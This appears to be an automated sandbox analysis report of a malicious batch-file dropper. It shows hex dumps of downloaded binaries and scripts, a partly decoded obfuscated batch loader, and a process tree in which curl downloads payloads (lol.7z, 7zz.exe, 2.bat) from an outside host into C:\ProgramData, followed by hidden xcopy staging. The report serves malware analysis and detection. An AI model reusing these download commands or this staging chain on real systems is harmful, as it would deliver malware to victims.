                                                                                                                                  2023-07-18 15:37:08 UTC2604INData Raw: ff ff 5f 5e 5b 83 f9 03 76 11 8b 54 24 18 33 c0 89 02 8b c5 5d 83 c4 0c c2 0c 00 8b 54 24 18 49 d3 e0 83 e0 07 89 02 8b c5 5d 83 c4 0c c2 0c 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 83 ec 2c 83 fa 10 73 08 33 c0 83 c4 2c c2 08 00 8b 44 24 30 53 55 83 ea 10 56 2b c1 57 89 54 24 28 c7 44 24 10 00 00 00 00 8b f9 89 44 24 24 90 0f b6 07 83 e0 1f 0f b6 88 bc c5 47 00 b8 05 00 00 00 33 f6 89 4c 24 20 89 44 24 1c 89 74 24 18 8b 54 24 20 8b ce d3 ea f6 c2 01 0f 84 84 01 00 00 8b f0 8b c8 c1 ee 03 0f b6 44 37 05 99 0f a4 c2 08 c1 e0 08 8b d8 0f b6 44 37 04 8b ea 99 83 e1 07 03 d8 0f b6 44 37 03 13 ea 0f a4 dd 08 99 c1 e3 08 03 d8 0f b6 44 37 02 13 ea 0f a4 dd 08 99 c1 e3 08 03 d8 0f b6 44 37 01 13 ea 0f a4 dd 08 99 c1 e3 08 03 d8 0f b6 04 37 13 ea 0f a4 dd 08
                                                                                                                                  Data Ascii: _^[vT$3]T$I],s3,D$0SUV+WT$(D$D$$G3L$ D$t$T$ D7D7D7D7D77
                                                                                                                                  2023-07-18 15:37:08 UTC2620INData Raw: 75 08 8b d1 c7 02 02 00 00 00 83 7e 78 08 0f 85 da fd ff ff e9 5f fd ff ff bd 01 00 00 00 e9 61 fd ff ff 8b 44 24 48 c7 00 02 00 00 00 e9 50 fd ff ff 8b 4c 24 48 c7 01 03 00 00 00 e9 41 fd ff ff 8b 54 24 48 c7 02 03 00 00 00 e9 32 fd ff ff 8b e8 e9 2d fd ff ff 5f 5e 8b c5 5d 5b 83 c4 24 c2 14 00 5f 5e 5d 33 c0 5b 83 c4 24 c2 14 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 83 ec 08 8b 4c 24 10 8b 01 53 33 db 39 5f 18 55 8b 6c 24 14 0f 95 c3 89 44 24 0c c7 44 24 14 00 00 20 00 c7 01 00 00 00 00 83 c3 05 3b c3 73 0d 5d b8 07 00 00 00 5b 83 c4 08 c2 0c 00 8b 0f 2b c3 89 44 24 08 e8 a6 25 00 00 8b 57 14 8d 44 24 14 50 68 00 00 01 00 8d 4c 24 10 51 8b 0f 03 dd 53 e8 6a 62 00 00 8b 54 24 14 85 d2 0f 84 9f 01 00 00 56 85 c0 75 2c 8b 74 24 0c 8d 46 02 3b c2 73
                                                                                                                                  Data Ascii: u~x_aD$HPL$HAT$H2-_^][$_^]3[$L$S39_Ul$D$D$ ;s][+D$%WD$PhL$QSjbT$Vu,t$F;s
                                                                                                                                  2023-07-18 15:37:08 UTC2636INData Raw: 0f b6 8c 24 80 00 00 00 57 8d bd a0 0e 03 00 e8 da f0 ff ff eb 50 0f b6 84 24 80 00 00 00 c7 44 24 34 00 00 00 00 0d 00 01 00 00 8d 49 00 8b c8 c1 e9 08 0f b7 14 4f 8b c8 c1 e9 07 83 e1 01 f7 d9 c1 f9 04 83 e1 7f c1 ea 04 33 d1 8b 4c 24 34 03 8c 95 a0 0e 03 00 03 c0 89 4c 24 34 3d 00 00 01 00 72 ca 8b c1 8b 54 24 2c 03 d0 89 54 24 2c 3b 93 d0 06 00 00 73 2c 89 93 d0 06 00 00 8b 54 24 14 89 93 e8 06 00 00 c7 83 ec 06 00 00 ff ff ff ff c7 83 d8 06 00 00 00 00 00 00 c7 44 24 28 01 00 00 00 8b 4c 24 40 0f b7 84 4d b0 25 03 00 0f b7 94 75 30 27 03 00 35 f0 07 00 00 c1 e8 04 8b 84 85 a0 0e 03 00 03 44 24 24 81 f2 f0 07 00 00 c1 ea 04 8b bc 95 a0 0e 03 00 8b 54 24 14 03 f8 89 44 24 58 8a 84 24 80 00 00 00 89 7c 24 48 38 44 24 13 75 61 39 93 e8 06 00 00 73 09 83
                                                                                                                                  Data Ascii: $WP$D$4IO3L$4L$4=rT$,T$,;s,T$D$(L$@M%u0'5D$$T$D$X$|$H8D$ua9s
                                                                                                                                  2023-07-18 15:37:08 UTC2652INData Raw: 24 14 8a 48 02 80 f9 07 73 14 fe 48 03 75 0f 66 d1 20 b2 03 d2 e2 fe c1 88 48 02 88 50 03 89 7e 08 8a 1f 8b ce e8 14 fb ff ff 5f 5e 5d 0f b6 c3 5b 81 c4 0c 05 00 00 c3 5f 5e 5d b8 fe ff ff ff 5b 81 c4 0c 05 00 00 c3 cc cc cc cc cc cc 33 c0 89 01 89 41 04 c7 41 08 ff ff ff ff 88 41 0c c7 41 10 01 00 00 00 89 41 14 c3 cc cc cc cc 8b 46 08 33 d2 f7 74 24 0c 53 bb 00 00 00 00 8b c8 0f af 4c 24 08 01 0e 11 5e 04 0f af 44 24 0c 89 46 08 3d 00 00 00 01 73 78 55 57 83 cd ff 90 8b 3e c1 66 08 08 81 ff 00 00 00 ff 72 10 8b 56 04 8b c7 b1 20 e8 36 67 00 00 85 c0 74 3a 8a 5e 0c 8b 06 8b 56 04 8b 7e 18 b1 20 e8 20 67 00 00 8b ca 8d 14 03 8b 07 8b cf ff d0 80 cb ff 01 6e 10 8b 46 10 11 6e 14 0b 46 14 75 d5 8b 3e 8b cf c1 e9 18 88 4e 0c 33 db 83 46 10 01 89 5e 04 11 5e
                                                                                                                                  Data Ascii: $HsHuf HP~_^][_^][3AAAAAF3t$SL$^D$F=sxUW>frV 6gt:^V~ gnFnFu>N3F^^
                                                                                                                                  2023-07-18 15:37:08 UTC2668INData Raw: 89 51 58 89 41 5c 89 41 60 89 81 a8 00 00 00 89 81 bc 00 00 00 89 81 d0 00 00 00 89 81 e4 00 00 00 89 01 89 41 04 89 41 48 89 41 4c c3 cc 83 c1 58 e9 98 f9 ff ff cc cc cc cc cc cc cc cc 83 ec 58 8b 44 24 5c 53 8b 5c 24 68 55 8b 6c 24 68 56 57 89 54 24 10 8b 13 8b f9 8b 08 c7 00 00 00 00 00 8b 44 24 7c c7 03 00 00 00 00 89 4c 24 1c 89 54 24 18 c7 00 00 00 00 00 eb 03 8d 49 00 8b 0b 8b 74 24 18 8b 07 2b f1 89 74 24 74 83 f8 06 0f 85 17 01 00 00 8b 44 24 1c 8b 4c 24 6c 2b 01 89 74 24 70 89 44 24 74 85 f6 75 08 85 c0 0f 84 91 05 00 00 8b 54 24 7c 8b 44 24 78 52 50 6a 00 8d 4c 24 7c 51 55 8d 94 24 88 00 00 00 52 8b 54 24 28 8d 4f 58 e8 d5 f9 ff ff 8b 74 24 74 8b 54 24 10 56 8d 8f 90 01 00 00 89 44 24 18 e8 ad f1 ff ff 8b 44 24 70 01 03 8b 4c 24 6c 03 e8 01 47
                                                                                                                                  Data Ascii: QXA\A`AAHALXXD$\S\$hUl$hVWT$D$|L$T$It$+t$tD$L$l+t$pD$tuT$|D$xRPjL$|QU$RT$(OXt$tT$VD$D$pL$lG
                                                                                                                                  2023-07-18 15:37:08 UTC2684INData Raw: 0f 83 e6 f0 eb 03 6a 10 5e 89 75 0c 89 7d dc 83 fe e0 0f 87 f3 00 00 00 6a 09 e8 59 1a 00 00 59 c7 45 fc 01 00 00 00 8d 45 d4 50 8d 45 c8 50 53 e8 3f 2d 00 00 83 c4 0c 8b f8 89 7d d0 85 ff 0f 84 aa 00 00 00 3b 35 5c 01 49 00 73 5c 8b de c1 eb 04 53 57 ff 75 d4 ff 75 c8 e8 dd 30 00 00 83 c4 10 85 c0 74 08 8b 45 08 89 45 dc eb 38 53 e8 9c 2d 00 00 59 89 45 dc 85 c0 74 2a 0f b6 07 c1 e0 04 89 45 cc 3b c6 72 02 8b c6 50 ff 75 08 ff 75 dc e8 37 fa ff ff 57 ff 75 d4 ff 75 c8 e8 28 2d 00 00 83 c4 18 8b 5d 08 83 7d dc 00 75 53 56 6a 00 ff 35 80 65 49 00 ff 15 8c a1 47 00 89 45 dc 85 c0 74 3d 0f b6 07 c1 e0 04 89 45 cc 3b c6 72 02 8b c6 50 53 ff 75 dc e8 f0 f9 ff ff 57 ff 75 d4 ff 75 c8 e8 e1 2c 00 00 83 c4 18 eb 13 56 53 6a 00 ff 35 80 65 49 00 ff 15 94 a1 47 00
                                                                                                                                  Data Ascii: j^u}jYYEEPEPS?-};5\Is\SWuu0tEE8S-YEt*E;rPuu7Wuu(-]}uSVj5eIGEt=E;rPSuWuu,VSj5eIG
                                                                                                                                  2023-07-18 15:37:08 UTC2700INData Raw: d5 8b f0 3b f3 74 0c c7 05 40 38 49 00 01 00 00 00 eb 28 ff 15 f0 a1 47 00 8b f8 3b fb 0f 84 ea 00 00 00 c7 05 40 38 49 00 02 00 00 00 e9 8f 00 00 00 83 f8 01 0f 85 81 00 00 00 3b f3 75 0c ff d5 8b f0 3b f3 0f 84 c2 00 00 00 66 39 1e 8b c6 74 0e 40 40 66 39 18 75 f9 40 40 66 39 18 75 f2 2b c6 8b 3d 44 a0 47 00 d1 f8 53 53 40 53 53 50 56 53 53 89 44 24 34 ff d7 8b e8 3b eb 74 32 55 e8 4e b4 ff ff 3b c3 59 89 44 24 10 74 23 53 53 55 50 ff 74 24 24 56 53 53 ff d7 85 c0 75 0e ff 74 24 10 e8 65 b5 ff ff 59 89 5c 24 10 8b 5c 24 10 56 ff 15 ec a1 47 00 8b c3 eb 53 83 f8 02 75 4c 3b fb 75 0c ff 15 f0 a1 47 00 8b f8 3b fb 74 3c 38 1f 8b c7 74 0a 40 38 18 75 fb 40 38 18 75 f6 2b c7 40 8b e8 55 e8 e7 b3 ff ff 8b f0 59 3b f3 75 04 33 f6 eb 0b 55 57 56 e8 cf b9 ff ff
                                                                                                                                  Data Ascii: ;t@8I(G;@8I;u;f9t@@f9u@@f9u+=DGSS@SSPVSSD$4;t2UN;YD$t#SSUPt$$VSSut$eY\$\$VGSuL;uG;t<8t@8u@8u+@UY;u3UWV
                                                                                                                                  2023-07-18 15:37:08 UTC2716INData Raw: f8 ff 8d 4d cc e9 91 cd f8 ff 8d 4d d8 e9 89 cd f8 ff 8d 4d c0 e9 81 cd f8 ff 8d 4d d8 e9 79 cd f8 ff 8d 4d c0 e9 71 cd f8 ff 8d 4d 94 e9 e7 39 fb ff 8d 4d 94 e9 df 39 fb ff 8d 4d bc e9 32 d9 f8 ff 8d 4d 94 e9 cf 39 fb ff b8 28 01 48 00 e9 02 6a ff ff cc cc 8d 4d e8 e9 3d cd f8 ff 8d 4d d0 e9 35 cd f8 ff 8d 4d dc e9 2d cd f8 ff b8 a8 01 48 00 e9 de 69 ff ff cc cc 8d 4d e0 e9 19 cd f8 ff b8 e0 01 48 00 e9 ca 69 ff ff cc cc 8d 4d e8 e9 05 cd f8 ff b8 08 02 48 00 e9 b6 69 ff ff cc cc 8d 4d e8 e9 f1 cc f8 ff b8 30 02 48 00 e9 a2 69 ff ff cc cc 8d 4d e0 e9 dd cc f8 ff b8 58 02 48 00 e9 8e 69 ff ff cc cc 8d 4d e0 e9 c9 cc f8 ff b8 80 02 48 00 e9 7a 69 ff ff cc cc 8d 4d e4 e9 b5 cc f8 ff 8d 4d cc e9 ad cc f8 ff 8d 4d d8 e9 a5 cc f8 ff b8 a8 02 48 00 e9 56 69 ff
                                                                                                                                  Data Ascii: MMMMyMqM9M9M2M9(HjM=M5M-HiMHiMHiM0HiMXHiMHziMMMHVi
                                                                                                                                  2023-07-18 15:37:08 UTC2732INData Raw: e9 96 8d f8 ff 8d 8d 34 ff ff ff e9 8b 8d f8 ff 8d 8d 1c ff ff ff e9 80 8d f8 ff 8d 8d 04 ff ff ff e9 75 8d f8 ff 8d 8d ec fe ff ff e9 6a 8d f8 ff b8 c8 66 48 00 e9 1b 2a ff ff cc cc cc 8b 4d f0 e9 d3 f9 fa ff b8 90 67 48 00 e9 06 2a ff ff cc cc ff 75 f0 e8 cc ee f8 ff 59 c3 b8 b8 67 48 00 e9 f0 29 ff ff 8d 4d d4 e9 f7 61 fc ff b8 e0 67 48 00 e9 de 29 ff ff cc cc b8 08 68 48 00 e9 d2 29 ff ff cc cc 8d 4d e0 e9 73 45 fc ff b8 98 68 48 00 e9 be 29 ff ff cc cc 8d 8d 58 ff ff ff e9 58 40 fc ff b8 c0 68 48 00 e9 a7 29 ff ff cc cc cc b8 20 69 48 00 e9 9a 29 ff ff cc cc 8d 4d d0 e9 9f 61 fc ff b8 78 69 48 00 e9 86 29 ff ff cc cc 8d 8d 58 ff ff ff e9 20 40 fc ff b8 a0 69 48 00 e9 6f 29 ff ff cc cc cc 8d 8d c4 fe ff ff e9 08 40 fc ff 8d 8d 5c ff ff ff e9 fd 3f fc
                                                                                                                                  Data Ascii: 4ujfH*MgH*uYgH)MagH)hH)MsEhH)XX@hH) iH)MaxiH)X @iHo)@\?
                                                                                                                                  2023-07-18 15:37:08 UTC2748INData Raw: 6f 70 75 70 00 00 47 65 74 41 63 74 69 76 65 57 69 6e 64 6f 77 00 4d 65 73 73 61 67 65 42 6f 78 41 00 75 73 65 72 33 32 2e 64 6c 6c 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 36 22 47 00 3a 22 47 00 ff ff ff ff ea 22 47 00 ee 22 47 00 ff ff ff ff 6e 24 47 00 72 24 47 00 48 3a 6d 6d 3a 73 73 00 64 64 64 64 2c 20 4d 4d 4d 4d 20 64 64 2c 20 79 79 79 79 00 4d 2f 64 2f 79 79 00 00 50 4d 00 00 41 4d 00 00 44 65 63 65 6d 62 65 72 00 00 00 00 4e 6f 76 65 6d 62 65 72 00 00 00 00 4f 63 74 6f 62 65 72 00 53 65 70 74 65 6d 62 65 72 00 00 00 41 75 67 75 73 74 00 00 4a 75 6c 79 00 00 00 00 4a 75 6e 65 00 00 00 00 41 70 72 69 6c 00 00 00 4d 61 72 63 68 00 00 00 46 65 62 72 75 61 72 79 00 00 00 00 4a 61 6e 75 61 72 79 00 44 65 63 00 4e 6f 76 00 4f 63 74 00 53 65 70 00 41
                                                                                                                                  Data Ascii: opupGetActiveWindowMessageBoxAuser32.dll6"G:"G"G"Gn$Gr$GH:mm:ssdddd, MMMM dd, yyyyM/d/yyPMAMDecemberNovemberOctoberSeptemberAugustJulyJuneAprilMarchFebruaryJanuaryDecNovOctSepA
                                                                                                                                  2023-07-18 15:37:08 UTC2764INData Raw: 00 00 3a 53 47 00 06 00 00 00 44 53 47 00 0b 00 00 00 4c 53 47 00 0b 00 00 00 54 53 47 00 06 00 00 00 5c 53 47 00 06 00 00 00 66 53 47 00 0f 00 00 00 6e 53 47 00 10 00 00 00 76 53 47 00 06 00 00 00 7e 53 47 00 06 00 00 00 88 53 47 00 13 00 00 00 90 53 47 00 14 00 00 00 98 53 47 00 14 00 00 00 a2 53 47 00 20 05 93 19 02 00 00 00 78 0d 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff b4 53 47 00 00 00 00 00 bf 53 47 00 20 05 93 19 02 00 00 00 a8 0d 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff d4 53 47 00 ff ff ff ff df 53 47 00 20 05 93 19 01 00 00 00 d8 0d 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff f4 53 47 00 20 05 93 19 01 00 00 00 00 0e 48 00 00 00 00 00 00
                                                                                                                                  Data Ascii: :SGDSGLSGTSG\SGfSGnSGvSG~SGSGSGSGSG xHSGSG HSGSG HSG H
                                                                                                                                  2023-07-18 15:37:08 UTC2780INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 9c 7a 47 00 20 05 93 19 06 00 00 00 28 4d 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff b0 7a 47 00 00 00 00 00 b8 7a 47 00 01 00 00 00 c3 7a 47 00 02 00 00 00 ce 7a 47 00 03 00 00 00 d9 7a 47 00 04 00 00 00 e4 7a 47 00 20 05 93 19 02 00 00 00 78 4d 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff f8 7a 47 00 00 00 00 00 03 7b 47 00 20 05 93 19 01 00 00 00 a8 4d 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 18 7b 47 00 20 05 93 19 04 00 00 00 d0 4d 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 30 7b 47 00 00 00 00 00 38 7b 47 00 01 00 00 00 43 7b 47 00 02 00 00 00 4e 7b 47 00 20
                                                                                                                                  Data Ascii: zG (MHzGzGzGzGzGzG xMHzG{G MH{G MH0{G8{GC{GN{G
                                                                                                                                  2023-07-18 15:37:08 UTC2796INData Raw: 6d 70 61 72 65 46 69 6c 65 54 69 6d 65 00 bc 00 46 69 6c 65 54 69 6d 65 54 6f 53 79 73 74 65 6d 54 69 6d 65 00 00 bb 01 47 65 74 53 79 73 74 65 6d 49 6e 66 6f 00 fa 01 47 6c 6f 62 61 6c 4d 65 6d 6f 72 79 53 74 61 74 75 73 00 00 77 01 47 65 74 4d 6f 64 75 6c 65 48 61 6e 64 6c 65 41 00 00 88 00 44 6f 73 44 61 74 65 54 69 6d 65 54 6f 46 69 6c 65 54 69 6d 65 00 ba 00 46 69 6c 65 54 69 6d 65 54 6f 44 6f 73 44 61 74 65 54 69 6d 65 00 4e 03 53 79 73 74 65 6d 54 69 6d 65 54 6f 46 69 6c 65 54 69 6d 65 00 00 be 01 47 65 74 53 79 73 74 65 6d 54 69 6d 65 00 83 03 57 61 69 74 46 6f 72 4d 75 6c 74 69 70 6c 65 4f 62 6a 65 63 74 73 00 00 73 02 4f 70 65 6e 45 76 65 6e 74 41 00 00 65 03 55 6e 6d 61 70 56 69 65 77 4f 66 46 69 6c 65 00 5e 02 4d 61 70 56 69 65 77 4f 66 46 69
                                                                                                                                  Data Ascii: mpareFileTimeFileTimeToSystemTimeGetSystemInfoGlobalMemoryStatuswGetModuleHandleADosDateTimeToFileTimeFileTimeToDosDateTimeNSystemTimeToFileTimeGetSystemTimeWaitForMultipleObjectssOpenEventAeUnmapViewOfFile^MapViewOfFi
                                                                                                                                  2023-07-18 15:37:08 UTC2812INData Raw: 00 00 00 00 00 00 42 00 43 00 4a 00 32 00 00 00 00 00 00 00 00 00 e0 58 44 00 60 59 44 00 03 01 03 03 00 00 00 00 28 d9 48 00 01 00 00 00 01 00 00 00 00 00 00 00 42 00 43 00 4a 00 00 00 90 5b 44 00 c0 5b 44 00 05 02 03 03 00 00 00 00 fc d9 48 00 01 00 00 00 01 00 00 00 00 00 00 00 e0 5b 44 00 00 5c 44 00 01 04 03 03 00 00 00 00 f0 d9 48 00 01 00 00 00 01 00 00 00 00 00 00 00 20 5c 44 00 40 5c 44 00 01 05 03 03 00 00 00 00 e8 d9 48 00 01 00 00 00 01 00 00 00 00 00 00 00 60 5c 44 00 80 5c 44 00 01 07 03 03 00 00 00 00 dc d9 48 00 01 00 00 00 01 00 00 00 00 00 00 00 a0 5c 44 00 c0 5c 44 00 05 08 03 03 00 00 00 00 d0 d9 48 00 01 00 00 00 01 00 00 00 00 00 00 00 53 00 50 00 41 00 52 00 43 00 00 00 41 00 52 00 4d 00 54 00 00 00 00 00 41 00 52 00 4d 00 00 00 49
                                                                                                                                  Data Ascii: BCJ2XD`YD(HBCJ[D[DH[D\DH \D@\DH`\D\DH\D\DHSPARCARMTARMI


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  2192.168.2.549722188.127.225.160443C:\Windows\System32\curl.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2023-07-18 15:37:09 UTC2826OUTGET /05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/2.bat HTTP/1.1
                                                                                                                                  Host: ponraj.com
                                                                                                                                  User-Agent: curl/7.55.1
                                                                                                                                  Accept: */*
                                                                                                                                  2023-07-18 15:37:09 UTC2826INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                  Date: Tue, 18 Jul 2023 15:37:09 GMT
                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                  Content-Length: 787
                                                                                                                                  Connection: close
                                                                                                                                  Last-Modified: Mon, 17 Jul 2023 12:01:17 GMT
                                                                                                                                  ETag: "313-600ad8e59dc47"
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  2023-07-18 15:37:09 UTC2826INData Raw: 40 65 63 68 6f 20 6f 66 66 0d 0a 0d 0a 3a 3a 20 33 5a 36 66 36 66 73 36 66 73 73 62 0d 0a 3a 3a 20 33 5a 36 66 73 36 66 73 62 0d 0a 0d 0a 73 65 74 20 22 66 64 61 61 3d 73 65 74 20 22 0d 0a 25 66 64 61 61 25 22 63 76 62 66 67 67 64 66 67 3d 43 3a 5c 50 72 6f 67 22 0d 0a 25 66 64 61 61 25 22 69 75 69 75 69 75 69 75 69 3d 72 61 6d 44 22 0d 0a 25 66 64 61 61 25 22 6a 68 67 67 66 67 3d 61 74 61 5c 22 0d 0a 0d 0a 0d 0a 73 74 61 72 74 20 2f 62 20 2f 6d 69 6e 20 78 63 6f 70 79 20 2f 68 20 2f 79 20 37 7a 7a 2e 65 78 65 20 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 20 26 26 20 73 74 61 72 74 20 2f 62 20 2f 6d 69 6e 20 78 63 6f 70 79 20 2f 68 20 2f 79 20 6c 6f 6c 2e 37 7a 20 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 20 26 26 20 73 74 61 72 74 20 2f 62 20 2f 6d
                                                                                                                                  Data Ascii: @echo off:: 3Z6f6fs6fssb:: 3Z6fs6fsbset "fdaa=set "%fdaa%"cvbfggdfg=C:\Prog"%fdaa%"iuiuiuiui=ramD"%fdaa%"jhggfg=ata\"start /b /min xcopy /h /y 7zz.exe C:\ProgramData\ && start /b /min xcopy /h /y lol.7z C:\ProgramData\ && start /b /m


                                                                                                                                  Statistics

                                                                                                                                  CPU Usage

                                                                                                                                  Click to jump to process

                                                                                                                                  Memory Usage

                                                                                                                                  Click to jump to process

                                                                                                                                  High Level Behavior Distribution

                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                  Behavior

                                                                                                                                  Click to jump to process

                                                                                                                                  System Behavior

                                                                                                                                  General

                                                                                                                                  Target ID:0
                                                                                                                                  Start time:17:37:05
                                                                                                                                  Start date:18/07/2023
                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\tUUPQygorhzFkIcHuB.bat" "
                                                                                                                                  Imagebase:0x7ff627730000
                                                                                                                                  File size:273'920 bytes
                                                                                                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  General

                                                                                                                                  Target ID:1
                                                                                                                                  Start time:17:37:05
                                                                                                                                  Start date:18/07/2023
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  Imagebase:0x7ff7fcd70000
                                                                                                                                  File size:625'664 bytes
                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  General

                                                                                                                                  Target ID:2
                                                                                                                                  Start time:17:37:05
                                                                                                                                  Start date:18/07/2023
                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:cmd.exe /c C:\ProgramData\sett.bat"
                                                                                                                                  Imagebase:0x7ff627730000
                                                                                                                                  File size:273'920 bytes
                                                                                                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  General

                                                                                                                                  Target ID:3
                                                                                                                                  Start time:17:37:05
                                                                                                                                  Start date:18/07/2023
                                                                                                                                  Path:C:\Windows\System32\curl.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:curl -k "https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lol.7z" -o "C:\ProgramData\lol.7z"
                                                                                                                                  Imagebase:0x7ff63d2f0000
                                                                                                                                  File size:424'448 bytes
                                                                                                                                  MD5 hash:BDEBD2FC4927DA00EEA263AF9CF8F7ED
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:moderate

                                                                                                                                  General

                                                                                                                                  Target ID:4
                                                                                                                                  Start time:17:37:07
                                                                                                                                  Start date:18/07/2023
                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:cmd.exe /c C:\ProgramData\7z.bat"
                                                                                                                                  Imagebase:0x7ff627730000
                                                                                                                                  File size:273'920 bytes
                                                                                                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  General

                                                                                                                                  Target ID:5
                                                                                                                                  Start time:17:37:07
                                                                                                                                  Start date:18/07/2023
                                                                                                                                  Path:C:\Windows\System32\curl.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:curl -k "https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe" -o "C:\ProgramData\7zz.exe"
                                                                                                                                  Imagebase:0x7ff63d2f0000
                                                                                                                                  File size:424'448 bytes
                                                                                                                                  MD5 hash:BDEBD2FC4927DA00EEA263AF9CF8F7ED
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:moderate

                                                                                                                                  General

                                                                                                                                  Target ID:6
                                                                                                                                  Start time:17:37:09
                                                                                                                                  Start date:18/07/2023
                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:cmd.exe /c C:\ProgramData\2.bat"
                                                                                                                                  Imagebase:0x7ff627730000
                                                                                                                                  File size:273'920 bytes
                                                                                                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  General

                                                                                                                                  Target ID:7
                                                                                                                                  Start time:17:37:09
                                                                                                                                  Start date:18/07/2023
                                                                                                                                  Path:C:\Windows\System32\curl.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:curl -k "https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/2.bat" -o "C:\ProgramData\2.bat"
                                                                                                                                  Imagebase:0x7ff63d2f0000
                                                                                                                                  File size:424'448 bytes
                                                                                                                                  MD5 hash:BDEBD2FC4927DA00EEA263AF9CF8F7ED
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  General

                                                                                                                                  Target ID:8
                                                                                                                                  Start time:17:37:10
                                                                                                                                  Start date:18/07/2023
                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:cmd.exe /c C:\ProgramData\2.bat"
                                                                                                                                  Imagebase:0x7ff627730000
                                                                                                                                  File size:273'920 bytes
                                                                                                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  General

                                                                                                                                  Target ID:9
                                                                                                                                  Start time:17:37:10
                                                                                                                                  Start date:18/07/2023
                                                                                                                                  Path:C:\Windows\System32\xcopy.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:xcopy /h /y 7zz.exe C:\ProgramData\
                                                                                                                                  Imagebase:0x7ff754df0000
                                                                                                                                  File size:47'616 bytes
                                                                                                                                  MD5 hash:6BC7DB1465BEB7607CBCBD7F64007219
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  General

                                                                                                                                  Target ID:10
                                                                                                                                  Start time:17:37:10
                                                                                                                                  Start date:18/07/2023
                                                                                                                                  Path:C:\Windows\System32\xcopy.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:xcopy /h /y lol.7z C:\ProgramData\
                                                                                                                                  Imagebase:0x7ff754df0000
                                                                                                                                  File size:47'616 bytes
                                                                                                                                  MD5 hash:6BC7DB1465BEB7607CBCBD7F64007219
                                                                                                                                  Has elevated privileges:true
